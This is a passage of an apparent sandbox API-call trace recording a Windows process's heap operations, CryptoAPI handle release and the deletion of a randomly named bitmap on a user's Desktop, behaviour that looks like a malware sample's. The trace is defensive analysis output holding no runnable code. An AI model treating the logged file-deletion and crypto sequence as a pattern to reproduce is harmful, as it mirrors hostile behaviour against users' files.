CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.240] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.240] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0148.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0148.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0148.242] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.242] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0148.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0148.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0148.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0148.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0148.244] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.244] FreeLibrary (hLibModule=0x756e0000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0148.244] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0148.244] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0148.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0148.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0148.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0148.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.245] CloseHandle (hObject=0x2a0) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0148.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0148.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0148.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0148.247] CloseHandle (hObject=0x2d0) returned 1 [0148.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0148.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0148.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.423] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0148.423] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0148.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0148.423] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E-SkW-EYmoA5t.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp", lpFilePart=0x8cedf4*="E-SkW-EYmoA5t.bmp") returned 0x29 [0148.424] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\e-skw-eymoa5t.bmp")) returned 0x20 [0148.424] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e179da0, ftCreationTime.dwHighDateTime=0x1d5f0a1, ftLastAccessTime.dwLowDateTime=0x8cef6890, ftLastAccessTime.dwHighDateTime=0x1d5ee42, ftLastWriteTime.dwLowDateTime=0x8cef6890, ftLastWriteTime.dwHighDateTime=0x1d5ee42, nFileSizeHigh=0x0, nFileSizeLow=0x6d89, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="E-SkW-EYmoA5t.bmp", cAlternateFileName="E-SKW-~1.BMP")) returned 0xa87690 [0148.424] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\e-skw-eymoa5t.bmp")) returned 1 [0148.425] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e179da0, ftCreationTime.dwHighDateTime=0x1d5f0a1, ftLastAccessTime.dwLowDateTime=0x8cef6890, ftLastAccessTime.dwHighDateTime=0x1d5ee42, ftLastWriteTime.dwLowDateTime=0x8cef6890, ftLastWriteTime.dwHighDateTime=0x1d5ee42, nFileSizeHigh=0x0, nFileSizeLow=0x6d89, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="E-SkW-EYmoA5t.bmp", cAlternateFileName="E-SKW-~1.BMP")) returned 0 [0148.425] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0148.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0148.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0148.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0148.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0148.426] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0148.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0148.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0148.426] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0148.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0148.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0148.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0148.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0148.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0148.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0148.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0148.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0148.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 